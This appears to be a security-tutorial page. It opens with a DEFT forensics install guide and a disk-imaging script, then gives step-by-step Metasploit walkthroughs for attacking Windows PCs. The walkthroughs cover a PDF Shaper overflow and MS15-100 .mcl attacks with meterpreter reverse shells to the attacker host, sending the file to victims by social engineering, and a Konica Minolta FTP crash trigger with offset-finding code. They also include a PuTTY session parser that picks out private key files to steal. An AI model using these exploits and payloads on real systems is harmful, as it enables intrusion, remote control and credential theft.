Forensic Investigation Tutorial Using DEFT

DEFT (Digital Evidence & Forensics Toolkit) is a Linux distribution built for computer forensics. It is designed to run live without altering or corrupting the devices (hard disks, USB drives, etc.) attached to the PC it is booted on.

DEFT is based on GNU/Linux. It can run live (from DVD or USB drive), be installed to disk, or run as a virtual appliance on VMware or VirtualBox. It uses LXDE as its desktop environment and WINE to run Windows tools under Linux, and it ships with a convenient mount manager for handling attached devices.

First, download the DEFT Linux ISO image from here and verify its published checksum before writing it to a DVD or USB drive.


After the DEFT boot loader starts, you will see a screen with several boot options. Select Install DEFT Linux 8.


Click Continue.


Select the third-party software option and click Continue.


The installer now asks for the installation type.
Select Guided - use entire disk and click Install Now.


Select your time zone and click OK.


Fill in your personal details and click Continue. When the installation finishes, click Restart Now.



After installation, the DEFT menu groups its tools into the following categories:

Analysis - Tools for analysing files of different types.

Antimalware - Search for rootkits, viruses, malware and malicious PDFs.

Data Recovery - File recovery software.

Hashing - Scripts for computing hashes (MD5, SHA1, SHA256, ...) of files and devices, so that evidence can be verified later.

Imaging - Applications for cloning or imaging hard drives and other sources.

Mobile Forensics - Analysis of BlackBerry, Android and iPhone devices, and of the SQLite databases that mobile applications typically use.

Network Forensics - Tools for processing data captured from or stored on a network.

OSINT - Applications that help gather information about users and their activity.

Password Recovery - Recovery of BIOS passwords and of passwords on compressed files and Office documents, brute-force tools, etc.

Reporting Tools - Tools that help with reporting and documenting the evidence: screen capture, note taking, desktop activity logging, etc.
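The Imaging and Hashing categories above are the core of an acquisition: make a bit-for-bit copy, hash the data, and keep going when a sector is unreadable. The following Python script is an added example written for this page, not a DEFT tool. It images a file-like source block by block, zero-fills unreadable blocks and records their offsets (the behaviour of dd conv=noerror,sync), hashes the data in the same pass, and then re-hashes the written image to verify it. The FlakyReader class and SAMPLE_DATA are constructed test input standing in for a disk with one bad sector; on a real device you would pass open('/dev/sdb', 'rb') as the source.

```python
import hashlib
import io
import os
import tempfile

# Sector-sized reads: one unreadable sector costs 512 bytes, not a whole large chunk.
BLOCK_SIZE = 512


class FlakyReader(io.BytesIO):
    """Constructed stand-in for a disk with unreadable sectors (sample input only)."""

    def __init__(self, data, bad_offsets=()):
        super().__init__(data)
        self.bad_offsets = set(bad_offsets)

    def read(self, size=-1):
        if self.tell() in self.bad_offsets:
            raise OSError(5, "Input/output error")  # what a bad sector looks like to the reader
        return super().read(size)


def image_device(src, dst, block_size=BLOCK_SIZE):
    """Copy src (readable binary file object) to dst (writable) block by block.

    Unreadable blocks are zero-filled and their offsets recorded, like
    `dd conv=noerror,sync`, so every later block keeps its original offset.
    MD5 and SHA-256 of the data actually written are computed in the same pass.
    """
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    bad_blocks = []
    offset = 0
    while True:
        try:
            chunk = src.read(block_size)
        except OSError:
            bad_blocks.append(offset)
            src.seek(offset + block_size)   # skip the bad block and keep going
            chunk = b"\x00" * block_size    # placeholder so the geometry is preserved
        if not chunk:
            break
        dst.write(chunk)
        md5.update(chunk)
        sha256.update(chunk)
        offset += len(chunk)
    dst.flush()
    return {"bytes": offset, "md5": md5.hexdigest(), "sha256": sha256.hexdigest(),
            "bad_blocks": bad_blocks}


def sha256_hex(data):
    """SHA-256 of an in-memory byte string (used to cross-check the acquisition hash)."""
    return hashlib.sha256(data).hexdigest()


def hash_file(path, block_size=BLOCK_SIZE):
    """Independent SHA-256 of a file on disk, used to verify the written image."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(block_size), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire(src, image_path, block_size=BLOCK_SIZE):
    """Image src to image_path, then re-hash the file on disk and compare."""
    with open(image_path, "wb") as dst:
        result = image_device(src, dst, block_size)
    result["verified"] = hash_file(image_path, block_size) == result["sha256"]
    return result


# Constructed 4096-byte "disk" (8 sectors of 512 bytes).
SAMPLE_DATA = bytes(range(256)) * 16


def demo():
    """Acquire the sample disk twice: once clean, once with sector 2 (offset 1024) unreadable."""
    results = {}
    for label, bad in (("clean", ()), ("flaky", (1024,))):
        fd, image_path = tempfile.mkstemp(suffix=".dd")
        os.close(fd)
        try:
            results[label] = acquire(FlakyReader(SAMPLE_DATA, bad), image_path)
        finally:
            os.remove(image_path)
    return results


if __name__ == "__main__":
    for label, r in demo().items():
        print(label, r["bytes"], "bytes  sha256", r["sha256"],
              "bad blocks", r["bad_blocks"], "verified", r["verified"])
```

If bad_blocks is not empty, the image hash will legitimately differ from a hash of the original media, so record both the hashes and the bad-block offsets in the acquisition notes rather than treating the mismatch as a failed copy.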


Hack Remote Windows PC using PDF Shaper Buffer Overflow

PDF Shaper is vulnerable to a buffer overflow when processing PDF files: the overflow is triggered when a specially crafted PDF is run through the Convert PDF to Image function. This Metasploit module has been tested successfully on Windows XP, 7, 8 and 10.

Exploit Targets
PDF Shaper

Requirements
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit  


Once the malicious PDF has been generated, it is stored on the attacker machine at
/root/.msf4/local/msf.pdf


Now set up a listener to handle the reverse connection the victim sends when the exploit runs. The payload, LHOST and LPORT must match the values used when the file was generated (the payload's default LPORT of 4444 is used here).

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
exploit

Send msf.pdf to the victim using any social-engineering technique. When the victim opens PDF Shaper and clicks the PDF to Image option


the Add File dialog appears; the victim selects msf.pdf and clicks Convert.




You will then receive a meterpreter session on the victim PC.

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

This module exploits an SEH overflow in Konica Minolta FTP Server 1.00, which fails to check the input size when parsing CWD commands. Konica FTP allows anonymous access by default, so valid credentials are usually not needed to exploit this vulnerability.

Exploit Targets
Konica Minolta FTP Server 1.00

Requirements
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit
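To see what the CWD bug described above looks like on the wire, here is an added Python example written for this page, not the Metasploit module's code. It logs in with the same anonymous/raj credentials used above, sends a single CWD whose argument is a Metasploit-style cyclic pattern (the pattern_create idea: every 3-byte window is unique, so the bytes that land in the SEH record give you the offset), and reports whether the server answered. The FakeFtpServer class is a constructed stand-in so the exchange runs offline; point send_overlong_cwd at RHOST port 21 to run it against a real target. Only the crash trigger and offset lookup are shown; the SEH handler address and shellcode that turn the crash into code execution are the module's job and are not reproduced here.

```python
import itertools
import socket
import string
import threading


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): unique 3-byte windows for 20280 bytes."""
    triples = itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    pattern = "".join(a + b + c for a, b, c in triples)
    return pattern[:length].encode()


def pattern_offset(pattern, value):
    """Offset of `value` (e.g. the 4 bytes seen in the SEH handler slot) inside the pattern, or -1."""
    return pattern.find(value)


def send_overlong_cwd(host, port, user="anonymous", password="raj", length=2000, timeout=5):
    """Log in, send CWD with a `length`-byte cyclic argument and return (pattern, reply).

    An empty reply means the server dropped the connection without answering,
    which is what a crashed service looks like from the client side.
    """
    pattern = cyclic_pattern(length)
    with socket.create_connection((host, port), timeout=timeout) as s:
        reader = s.makefile("rb")

        def expect(code):
            line = reader.readline()
            if not line.startswith(code):
                raise RuntimeError("expected %r, got %r" % (code, line))
            return line

        expect(b"220")
        s.sendall(b"USER " + user.encode() + b"\r\n")
        expect(b"331")
        s.sendall(b"PASS " + password.encode() + b"\r\n")
        expect(b"230")
        s.sendall(b"CWD " + pattern + b"\r\n")
        try:
            reply = reader.readline()
        except (socket.timeout, ConnectionError):
            reply = b""
    return pattern, reply


class FakeFtpServer(threading.Thread):
    """Constructed stand-in for a vulnerable FTP daemon; only here so the exchange runs offline.

    Speaks just enough FTP to reach CWD and 'crashes' (drops the connection without a reply)
    when the CWD argument is longer than CRASH_LEN, the way an unchecked copy would.
    """
    CRASH_LEN = 1024

    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.last_cwd_len = None

    def run(self):
        conn, _ = self.sock.accept()
        with conn:
            reader = conn.makefile("rb")
            conn.sendall(b"220 fake FTP ready\r\n")
            for line in reader:
                cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
                if cmd == b"USER":
                    conn.sendall(b"331 Password required\r\n")
                elif cmd == b"PASS":
                    conn.sendall(b"230 Logged in\r\n")
                elif cmd == b"CWD":
                    self.last_cwd_len = len(arg)
                    if len(arg) > self.CRASH_LEN:
                        break  # simulated crash: connection goes away with no reply
                    conn.sendall(b"250 Directory changed\r\n")
                else:
                    conn.sendall(b"502 Not implemented\r\n")
        self.sock.close()


def demo(length=2000):
    """Run the exchange against the fake server and summarise what happened."""
    srv = FakeFtpServer()
    srv.start()
    pattern, reply = send_overlong_cwd("127.0.0.1", srv.port, length=length)
    srv.join(timeout=5)
    return {"sent": len(pattern), "server_saw": srv.last_cwd_len,
            "reply": reply, "crashed": reply == b""}


if __name__ == "__main__":
    print(demo())
    print("offset of b2Ab:", pattern_offset(cyclic_pattern(2000), b"b2Ab"))
```

Against the real service, attach a debugger to the FTP process first: the four bytes in the overwritten SEH handler slot, fed to pattern_offset, give the offset the module's jump-to-handler address has to sit at.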


Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits a vulnerability in Windows Media Center. By supplying a UNC path in the *.mcl file, a remote file is automatically downloaded, which can result in arbitrary code execution on a victim that has not applied the MS15-100 update.

Exploit Targets
Windows 7

Requirements
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms15_100_mclexe)>set lport 443
msf exploit (ms15_100_mclexe)>exploit


The module generates an .mcl file that references the UNC path \\192.168.1.7\aqxtlL\msf.exe and hosts msf.exe at that location. When the victim opens the .mcl file, Windows Media Center fetches the executable from file://192.168.1.7/aqxtlL/msf.exe and shows the page given below




Type sessions -l to list the sessions opened when the victim opened the file.

Once a session is open, interact with it using sessions -i followed by its ID, then type sysinfo to get system information and shell to drop into the victim's command prompt.
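Since the weakness described above is an .mcl file pulling an executable from another host, the corresponding check on the defensive side is to look for .mcl files whose attributes reference a UNC path or a file:// URL on a remote host. The following Python is an added example written for this page, not part of the Metasploit module or of Windows. The <application run="..."> shape of the constructed samples is an assumption about the .mcl format; the detector does not rely on it, because it inspects every attribute of every element in the XML.

```python
import re
import xml.etree.ElementTree as ET

# \\host\share\... (either slash direction after the host) and file://host/...
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")
FILE_URL_RE = re.compile(r"^file://([^/]+)/", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def remote_references(mcl_text):
    """Return (element, attribute, host, value) for every attribute in the .mcl XML
    whose value points at another host, by UNC path or file:// URL."""
    root = ET.fromstring(mcl_text)
    hits = []
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            candidate = value.strip()
            m = UNC_RE.match(candidate) or FILE_URL_RE.match(candidate)
            if m and m.group(1).lower() not in LOCAL_HOSTS:
                hits.append((elem.tag, attr, m.group(1), value))
    return hits


def scan_file(path):
    """Apply remote_references to an .mcl file on disk."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return remote_references(f.read())


# Constructed samples; the element and attribute names are assumed, see the lead-in.
SAMPLE_MALICIOUS = '<application run="\\\\192.168.1.7\\aqxtlL\\msf.exe" name="msf" />'
SAMPLE_FILE_URL = '<application run="file://192.168.1.7/aqxtlL/msf.exe" name="msf" />'
SAMPLE_BENIGN = '<application run="C:\\Program Files\\Example\\viewer.exe" name="Viewer" />'
SAMPLE_LOCAL_URL = '<application run="file:///C:/Tools/viewer.exe" name="Viewer" />'


if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("file-url", SAMPLE_FILE_URL),
                          ("benign", SAMPLE_BENIGN), ("local-url", SAMPLE_LOCAL_URL)):
        print(label, remote_references(sample))
```

A hit is not proof of malice (a legitimately deployed .mcl can point at an internal share), but any .mcl arriving by mail or download that references an external host deserves a look, and the host it names is a usable network indicator.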

How to Hack Saved sessions in Putty using Metasploit

This post-exploitation module checks whether Pageant (the PuTTY agent) is running and retrieves saved session information from the registry. PuTTY is very configurable: a saved session can include the host name, the username and the private key file to use when authenticating. If a private key file is configured, the module attempts to download it and store it in loot. It also records the stored SSH host keys, which identify hosts the user has previously connected to and whose SSH fingerprint they accepted; those hosts are of particular interest when they are within the scope of a penetration test.

Exploit Targets
PuTTY

Requirements
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


This is a post-exploitation module, so it runs through an existing meterpreter session on the victim (use the session ID shown by sessions -l) and takes no payload or LHOST.

Now type use post/windows/gather/enum_putty_saved_sessions
msf post(enum_putty_saved_sessions)>set session 1
msf post(enum_putty_saved_sessions)>run


The module prints the saved sessions it finds and stores the retrieved data, together with any private key files it could download, under the Metasploit loot directory (by default /root/.msf4/loot). Open the saved file to view the session information.
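To show what the module gathers and why the key file paths matter, here is an added Python example written for this page, not the module's own code. It parses a .reg export of the PuTTY registry tree and pulls out the same data: the saved sessions under Software\SimonTatham\PuTTY\Sessions, and the SshHostKeys values, whose names record key type, port and host. SAMPLE_REG is a constructed export; on a real target the equivalent input is produced with reg export HKCU\Software\SimonTatham\PuTTY putty.reg (reg writes UTF-16, so open that file with encoding='utf-16' before passing its text to parse_reg).

```python
from urllib.parse import unquote

SESSIONS_PREFIX = r"HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions" + "\\"
HOSTKEYS_KEY = r"HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys"


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}} (string and dword values)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = name.strip('"')
        if value.startswith('"'):
            value = value[1:-1].replace('\\\\', '\\').replace('\\"', '"')  # undo .reg escaping
        elif value.startswith("dword:"):
            value = int(value[6:], 16)
        keys[current][name] = value
    return keys


def putty_sessions(keys):
    """One record per saved session: where it connects, as whom, and with which key file."""
    sessions = []
    for path, values in keys.items():
        if not path.startswith(SESSIONS_PREFIX):
            continue
        sessions.append({
            "session": unquote(path[len(SESSIONS_PREFIX):]),  # PuTTY URL-encodes session names
            "host": values.get("HostName", ""),
            "port": values.get("PortNumber", 22),
            "user": values.get("UserName", ""),
            "protocol": values.get("Protocol", ""),
            "key_file": values.get("PublicKeyFile", ""),
        })
    return sessions


def known_hosts(keys):
    """SshHostKeys value names are '<keytype>@<port>:<host>'; return (host, port, keytype)."""
    out = []
    for name in keys.get(HOSTKEYS_KEY, {}):
        keytype, _, rest = name.partition("@")
        port, _, host = rest.partition(":")
        out.append((host, int(port), keytype))
    return out


def key_backed_sessions(sessions):
    """Sessions that reference a private key file: the ones worth collecting first."""
    return [s for s in sessions if s["key_file"]]


# Constructed export; host names, paths and the host-key blobs are made up.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\prod%20web]
"HostName"="10.0.0.5"
"PortNumber"=dword:00000016
"Protocol"="ssh"
"UserName"="deploy"
"PublicKeyFile"="C:\\Users\\raj\\keys\\deploy.ppk"

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\jumphost]
"HostName"="gw.example.net"
"PortNumber"=dword:000008ae
"Protocol"="ssh"
"UserName"="raj"
"PublicKeyFile"=""

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]
"rsa2@22:10.0.0.5"="0x10001,0xc0ffee"
"ssh-ed25519@2222:gw.example.net"="0x1234abcd"
"""


if __name__ == "__main__":
    keys = parse_reg(SAMPLE_REG)
    for s in putty_sessions(keys):
        print(s)
    print("key-backed:", [s["session"] for s in key_backed_sessions(putty_sessions(keys))])
    print("known hosts:", known_hosts(keys))
```

The key_file path is the target for the follow-up download; combined with host, port and user from the same record it is everything needed to reuse the session, which is why an unprotected .ppk on a compromised workstation is as good as a password.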